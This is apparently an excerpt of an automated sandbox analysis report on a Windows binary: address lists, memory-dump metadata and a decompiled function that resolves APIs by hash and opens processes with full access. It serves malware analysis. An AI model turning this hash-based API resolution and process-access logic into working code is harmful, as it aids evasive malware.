0x72ad97fb
0x72ad97fd
0x72ad9800
0x72ad9805
0x72ad980c
0x72ad9810
0x72ad9814
0x72ad981a
0x72ad9820
0x72ad9832
0x72ad9848
0x72ad9856
0x72ad9857
0x72ad9858
0x72ad9859
0x72ad985a
0x72ad9861
0x72ad986b
0x72ad9871
0x72ad9883
0x72ad9899
0x72ad98a7
0x72ad98a8
0x72ad98a9
0x72ad98aa
0x72ad98ab
0x72ad98b2
0x72ad98bc
0x72ad98c2
0x72ad98d4
0x72ad98ea
0x72ad98f8
0x72ad98f9
0x72ad98fa
0x72ad98fb
0x72ad98fc
0x72ad9903
0x72ad990d
0x72ad9913
0x72ad9925
0x72ad993b
0x72ad9949
0x72ad994a
0x72ad994b
0x72ad994c
0x72ad994d
0x72ad9950
0x72ad9954
0x72ad9958
0x72ad995e
0x72ad9964
0x72ad9976
0x72ad998c
0x72ad999a
0x72ad999b
0x72ad999c
0x72ad999d
0x72ad999e
0x72ad99a5
0x72ad99af
0x72ad99b5
0x72ad99c7
0x72ad99dd
0x72ad99eb
0x72ad99ec
0x72ad99ed
0x72ad99ee
0x72ad99ef
0x72ad99f6
0x72ad9a00
0x72ad9a06
0x72ad9a18
0x72ad9a2e
0x72ad9a3c
0x72ad9a3d
0x72ad9a3e
0x72ad9a3f
0x72ad9a40
0x72ad9a47
0x72ad9a51
0x72ad9a57
0x72ad9a69
0x72ad9a7f
0x72ad9a8d
0x72ad9a8e
0x72ad9a8f
0x72ad9a90
0x72ad9a96
0x72ad9a99
0x72ad9a9b
0x72ad9aa6
0x72ad9aab
0x72ad9ab0
0x72ad9abf
0x72ad9ac4
0x72ad9ac9
0x72ad9ad8
0x72ad9add
0x72ad9ae2
0x72ad9af1
0x72ad9af6
0x72ad9afb
0x72ad9b0a
0x72ad9b0f
0x72ad9b14
0x72ad9b23
0x72ad9b28
0x72ad9b2d
0x72ad9b3c
0x72ad9b41
0x72ad9b46
0x72ad9b55
0x72ad9b5a
0x72ad9b63
0x72ad9b6b
0x72ad9b70
0x72ad9b77
0x72ad9b84
0x72ad9b86
0x72ada1bf
0x72ada1c6
0x72ada1d2
0x00000000
0x72ada1d2
0x72ad9b8c
0x72ad9b95
0x72ad9b98
0x72ad9db0
0x72ad9db0
0x72ad9dbb
0x72ad9ddf
0x72ad9de1
0x00000000
0x00000000
0x72ad9de7
0x72ad9dec
0x72ad9df3
0x72ad9e00
0x72ad9e02
0x00000000
0x00000000
0x72ad9e08
0x72ad9e11
0x72ad9e12
0x72ad9e14
0x72ad9e17
0x00000000
0x00000000
0x00000000
0x72ad9e19
0x72ad9e1e
0x72ad9e29
0x72ad9e29
0x72ad9e2e
0x72ad9e35
0x72ad9e3c
0x72ad9e43
0x72ad9e48
0x72ad9e53
0x72ad9e55
0x00000000
0x00000000
0x72ad9e5b
0x72ad9e60
0x72ad9e67
0x72ad9e74
0x72ad9e76
0x00000000
0x00000000
0x72ad9e7c
0x72ad9e85
0x72ad9e86
0x72ad9e88
0x72ad9e8b
0x00000000
0x00000000
0x00000000
0x72ad9e8d
0x72ad9e9b
0x72ad9ea3
0x72ad9eae
0x72ad9eb5
0x72ad9ebc
0x72ad9ec0
0x72ad9ec4
0x72ad9eca
0x72ad9ed5
0x72ad9ee0
0x72ad9ee5
0x72ad9ee7
0x00000000
0x00000000
0x72ad9eed
0x72ad9ef8
0x72ad9f0e
0x72ad9f1e
0x72ad9f20
0x00000000
0x00000000
0x72ad9f26
0x72ad9f2b
0x72ad9f32
0x72ad9f3f
0x72ad9f41
0x00000000
0x00000000
0x72ad9f47
0x72ad9f50
0x72ad9f51
0x72ad9f53
0x72ad9f56
0x00000000
0x00000000
0x00000000
0x72ad9f58
0x72ad9f5d
0x72ad9f68
0x72ad9f71
0x72ad9f84
0x72ad9f85
0x72ad9f8c
0x72ad9f93
0x72ad9f9a
0x72ad9f9b
0x72ad9fa6
0x72ad9fa8
0x00000000
0x00000000
0x72ad9fae
0x72ad9fb3
0x72ad9fba
0x72ad9fc7
0x72ad9fc9
0x00000000
0x00000000
0x72ad9fcf
0x72ad9fd8
0x72ad9fd9
0x72ad9fdb
0x72ad9fde
0x00000000
0x00000000
0x00000000
0x72ad9fe0
0x72ada000
0x72ada005
0x72ada007
0x00000000
0x00000000
0x72ada016
0x72ada022
0x72ada02d
0x72ada039
0x72ada043
0x72ada043
0x72ada046
0x72ada04e
0x72ada05a
0x72ada069
0x72ada071
0x72ada074
0x72ada07d
0x72ada08d
0x72ada092
0x72ada09d
0x72ada0a6
0x72ada0b9
0x72ada0ba
0x72ada0c1
0x72ada0c8
0x72ada0cf
0x72ada0d0
0x72ada0db
0x72ada0dd
0x00000000
0x00000000
0x72ada0e3
0x72ada0e8
0x72ada0ef
0x72ada0fa
0x72ada0fc
0x72ada1b3
0x72ada1ba
0x00000000
0x72ada1ba
0x72ada102
0x72ada10b
0x72ada10c
0x72ada10e
0x72ada111
0x00000000
0x00000000
0x00000000
0x72ada113
0x72ada118
0x72ada123
0x72ada123
0x72ada126
0x72ada12a
0x72ada134
0x72ada138
0x72ada13f
0x72ada14a
0x72ada14e
0x72ada158
0x72ada162
0x72ada166
0x72ada16c
0x72ada177
0x72ada179
0x00000000
0x00000000
0x72ada183
0x72ada188
0x72ada18f
0x72ada19a
0x72ada19c
0x00000000
0x00000000
0x72ada19e
0x72ada1a7
0x72ada1a8
0x72ada1aa
0x72ada1ad
0x00000000
0x00000000
0x00000000
0x72ada1ad
0x72ada200
0x72ada202
0x72ada209
0x72ada20e
0x72ada211
0x72ada21f
0x72ada230
0x72ada23c
0x72ada248
0x72ada254
0x72ada260
0x72ada26c
0x72ada275
0x72ada27e
0x72ada287
0x72ada28e
0x00000000
0x72ada290
0x72ad9b9e
0x72ad9ba9
0x72ad9bb2
0x72ad9bb7
0x72ad9bc3
0x72ad9bc4
0x72ad9bd4
0x72ad9be2
0x72ad9bf5
0x72ad9c01
0x72ad9c0d
0x72ad9c19
0x72ad9c20
0x72ad9c23
0x72ad9c2e
0x72ad9c30
0x72ad9cdb
0x72ad9cdb
0x72ad9cde
0x72ad9ce7
0x72ad9ceb
0x72ad9cef
0x72ad9cf5
0x72ad9cf9
0x72ad9d05
0x72ad9d0f
0x72ad9d13
0x72ad9d19
0x72ad9d1f
0x72ad9d24
0x72ad9d26
0x72ad9d3e
0x72ad9d4a
0x72ad9d5e
0x72ad9d63
0x72ad9d6c
0x72ad9d6f
0x00000000
0x00000000
0x72ad9d75
0x72ad9d7a
0x72ad9d81
0x72ad9d8e
0x72ad9d90
0x00000000
0x00000000
0x00000000
0x72ad9d90
0x72ad9d28
0x72ad9d2f
0x00000000
0x72ad9d2f
0x72ad9c36
0x72ad9c41
0x72ad9c4f
0x72ad9c54
0x72ad9c56
0x72ad9c59
0x72ad9c62
0x72ad9c66
0x72ad9c6e
0x72ad9c74
0x72ad9c78
0x72ad9c7e
0x72ad9c8b
0x72ad9c8f
0x72ad9c93
0x72ad9c9b
0x72ad9ca1
0x72ad9ca6
0x72ad9ca8
0x00000000
0x00000000
0x72ad9cac
0x72ad9cad
0x72ad9cb2
0x72ad9cbc
0x72ad9cc3
0x72ad9cce
0x72ad9cd5
0x00000000
0x00000000
0x00000000
0x72ad9cd5
0x00000000
0x72ad9d96
0x72ad9d96
0x72ad9d9f
0x72ad9da0
0x72ad9da2
0x72ad9da2
0x00000000
0x72ad9dab
0x72ad9449
0x72ad944d
0x72ad9456
0x72ad945f
0x00000000

Strings

$EA, xrefs: 72AD91E1

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: 373f755d5f72ef2fd28e42e31c7536f836eede7abfa2f757c0ffc27d1768cfdd
Instruction ID: f590322bc276ba734362591b5f713caff2c832fd1139b43307bd6eaf0a8c9a23
Opcode Fuzzy Hash: 373f755d5f72ef2fd28e42e31c7536f836eede7abfa2f757c0ffc27d1768cfdd
Instruction Fuzzy Hash: BDA260715443419EC721DF28C980BDFBBF4AF95300F408A6DE4999B2ADEF31A949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 72ADA5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E72ADA5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E72ADB714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E72ADF56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E72ADF6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E72AE218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E72ADF6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E72ADF620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E72ADF620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x72aeb7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E72AE2F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E72ADF558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E72ADF558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E72ADB680(_t439 + 0x34);
											E72ADB680(_t439 + 8);
											goto L65;
										}
										L62:
										E72ADB680(_t439 + 0x34);
										E72ADB680(_t439 + 8);
										goto L63;
									}
									_t392 = E72ADF558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E72ADCB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E72ADC33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E72ADF8C4(_t439 + 0x14, E72ADF568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E72ADF558(_t439 + 0x14, E72ADF568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E72AE2F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E72ADF8C4(_t439 + 0x40, E72ADF568(_t439 + 0x3c) + 4);
											 *(E72ADF558(_t439 + 0x40, E72ADF568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E72ADCDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E72ADF558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E72ADF558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E72ADAD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E72ADCDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E72ADF558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E72ADF568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E72ADF568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E72ADF558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E72ADF558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E72AE382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E72ADF568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E72ADF8C4( *((intOrPtr*)(_t439 + 8)), E72ADF568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E72ADF568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E72ADF568( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E72ADF558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E72ADF558( *((intOrPtr*)(_t439 + 4)), _t413);
										E72AE382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E72ADF568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E72ADF8C4( *((intOrPtr*)(_t439 + 4)), E72ADF568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E72ADF8C4( *((intOrPtr*)(_t439 + 8)), E72ADF568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E72ADF558( *((intOrPtr*)(_t439 + 8)), E72ADF568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E72ADF8C4( *((intOrPtr*)(_t439 + 4)), E72ADF568( *_t439) + 4);
								 *(E72ADF558( *((intOrPtr*)(_t439 + 4)), E72ADF568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E72ADF558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E72AE2F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E72ADF558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E72ADF8C4( *((intOrPtr*)(_t439 + 8)), E72ADF568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E72ADF558( *((intOrPtr*)(_t439 + 8)), E72ADF568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E72ADF558(_t439 + 0x28,  *(_t439 + 0x70));
										E72ADF8C4( *((intOrPtr*)(_t439 + 4)), E72ADF568( *_t439) + 4);
										 *(E72ADF558( *((intOrPtr*)(_t439 + 4)), E72ADF568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E72ADF558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E72ADF558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E72ADF568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E72ADF568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E72ADF558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E72ADF558( *((intOrPtr*)(_t439 + 4)), _t420);
										E72AE382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E72ADF568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E72ADF8C4( *((intOrPtr*)(_t439 + 4)), E72ADF568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E72AE2F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E72ADF558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E72ADF568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E72ADF568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E72ADF558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E72ADF558( *((intOrPtr*)(_t439 + 8)), _t422);
										E72AE382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E72ADF568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E72ADF8C4( *((intOrPtr*)(_t439 + 8)), E72ADF568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E72ADF558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x72ada5ae
0x72ada5b0
0x72ada5bb
0x72ada5c1
0x72ada5c5
0x72ada5ca
0x72ada5d0
0x72ada5e0
0x00000000
0x72ada5e2
0x72ada5e2
0x72ada5ed
0x72ada5ed
0x72adab6b
0x72adab6d
0x72adab6e
0x72adabad
0x72adabb1
0x72adabbf
0x72adabcd
0x72adabcd
0x72adabb8
0x72adabd3
0x72adabd8
0x00000000
0x72adabd8
0x72adabbc
0x72adabbd
0x00000000
0x72ada5f7
0x72ada5f7
0x72ada5fb
0x72ada702
0x72ada702
0x72ada707
0x72ada818
0x72ada81c
0x72ada821
0x72ada825
0x72ada94f
0x72ada951
0x72ada955
0x72ada95e
0x72ada967
0x72ada96b
0x72ada974
0x72ada97b
0x72ada97c
0x72ada980
0x72ada984
0x72ada988
0x72ada98a
0x72adaaf4
0x72adaaf4
0x72adaafc
0x72adab14
0x72adab16
0x72adab18
0x72adab52
0x72adab52
0x72adab54
0x72adab54
0x72adab57
0x72adab72
0x72adab86
0x72adab89
0x72adab8e
0x72adab99
0x72adab9a
0x72adab9d
0x72adab9f
0x72adaba8
0x00000000
0x72adaba8
0x72adab59
0x72adab5d
0x72adab66
0x00000000
0x72adab66
0x72adab29
0x72adab39
0x72adab3d
0x72adab3d
0x72adab40
0x72adab43
0x72adab46
0x72adab4c
0x00000000
0x00000000
0x00000000
0x72adab4e
0x72ada992
0x72ada992
0x72ada994
0x72ada998
0x72ada99d
0x72ada99f
0x72ada9a3
0x72ada9a6
0x72ada9ae
0x72ada9b0
0x00000000
0x00000000
0x72ada9c7
0x72ada9e2
0x72ada9e4
0x72ada9f7
0x72ada9f9
0x72ada9fb
0x72adaa16
0x72adaa16
0x72adaa1a
0x72adaa1c
0x00000000
0x00000000
0x72adaa1e
0x72adaa21
0x72adaa42
0x72adaa61
0x72adaa67
0x72adaa6a
0x72adaa6f
0x72adaa70
0x72adaa74
0x00000000
0x00000000
0x72adaa7c
0x72adaa7c
0x72adaa7e
0x72adaa8a
0x72adaa96
0x72adaaa0
0x72adaaa3
0x72adaaa6
0x72adaaaa
0x72adaab1
0x72adaab5
0x72adaab9
0x72adaaba
0x72adaabe
0x72adaac3
0x72adaac8
0x72adaacc
0x72adaad0
0x72adaad6
0x72adaadc
0x72adaae2
0x72adaae8
0x72adaaed
0x72adaaee
0x72adaaee
0x00000000
0x72adaa7e
0x00000000
0x72adaa21
0x72ada9ff
0x72adaa10
0x72adaa12
0x72adaa14
0x00000000
0x00000000
0x00000000
0x72adaa14
0x72adaa27
0x00000000
0x72adaa27
0x72ada82b
0x72ada82e
0x72ada830
0x00000000
0x00000000
0x72ada838
0x72ada838
0x72ada83a
0x72ada83a
0x72ada84b
0x72ada84d
0x72ada850
0x00000000
0x00000000
0x72ada946
0x72ada947
0x72ada949
0x00000000
0x00000000
0x00000000
0x72ada949
0x72ada856
0x72ada859
0x72ada863
0x72ada868
0x72ada86a
0x72ada870
0x72ada877
0x72ada87b
0x72ada880
0x72ada884
0x72adacbf
0x72adacd3
0x72adacf6
0x72adacfb
0x72adacfb
0x72ada89b
0x72ada8a0
0x72ada8a0
0x72ada8a0
0x72ada8a0
0x72ada8a6
0x72ada8ab
0x72ada8ad
0x72ada8b2
0x72ada8b9
0x72ada8be
0x72ada8c0
0x72adac7d
0x72adac8e
0x72adaca8
0x72adacad
0x72adacad
0x72ada8d6
0x72ada8db
0x72ada8db
0x72ada8db
0x72ada8db
0x72ada8ef
0x72ada90d
0x72ada912
0x72ada922
0x72ada93f
0x72ada941
0x72ada941
0x00000000
0x72ada859
0x72ada70f
0x72ada70f
0x72ada711
0x72ada718
0x72ada726
0x72ada728
0x72ada72b
0x72ada732
0x72ada734
0x72ada765
0x72ada774
0x72ada776
0x72ada778
0x72ada796
0x72ada798
0x72ada79a
0x72ada7ad
0x72ada7cc
0x72ada7d2
0x72ada7d5
0x72ada7ec
0x72ada808
0x72ada80a
0x72ada80a
0x72ada80a
0x72ada80a
0x72ada79a
0x00000000
0x72ada778
0x72ada738
0x72ada738
0x72ada73a
0x72ada74b
0x72ada74d
0x72ada74f
0x00000000
0x00000000
0x72ada75b
0x72ada75c
0x72ada763
0x00000000
0x00000000
0x00000000
0x72ada763
0x72ada751
0x72ada754
0x00000000
0x00000000
0x72ada80d
0x72ada80d
0x72ada80e
0x72ada80e
0x00000000
0x72ada601
0x72ada603
0x72ada603
0x72ada605
0x72ada60c
0x72ada61a
0x72ada61c
0x72ada620
0x72ada624
0x72ada626
0x72ada654
0x72ada657
0x72ada65c
0x72ada660
0x72ada665
0x72ada66c
0x72ada671
0x72ada673
0x72adac3a
0x72adac4b
0x72adac6b
0x72adac70
0x72adac70
0x72ada689
0x72ada68e
0x72ada68e
0x72ada68e
0x72ada68e
0x72ada6a0
0x72ada6a2
0x72ada6a4
0x72ada6b5
0x72ada6b5
0x72ada6bb
0x72ada6c0
0x72ada6c4
0x72ada6ca
0x72ada6d1
0x72ada6d6
0x72ada6d8
0x72adabee
0x72adabff
0x72adac20
0x72adac25
0x72adac25
0x72ada6ef
0x72ada6f4
0x72ada6f4
0x72ada6f4
0x72ada6f4
0x72ada6f7
0x72ada6f7
0x00000000
0x72ada6f7
0x72ada62a
0x72ada62a
0x72ada62c
0x72ada63d
0x72ada63f
0x72ada641
0x00000000
0x00000000
0x72ada64d
0x72ada64e
0x72ada652
0x00000000
0x00000000
0x00000000
0x72ada652
0x72ada643
0x72ada646
0x00000000
0x00000000
0x72ada6f8
0x72ada6f8
0x72ada6f9
0x72ada6f9
0x00000000
0x72ada605
0x72ada5fb

Strings

, xrefs: 72ADABB3

Memory Dump Source

Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f9691dadf9d7232badd02d49f6dfef52a698c0b701af269373e7f031218fb8b1
Instruction ID: 3b564aa815ce0496aa95531e0da9861cdf96bf211a79c64a7a00e16fc6592508
Opcode Fuzzy Hash: f9691dadf9d7232badd02d49f6dfef52a698c0b701af269373e7f031218fb8b1
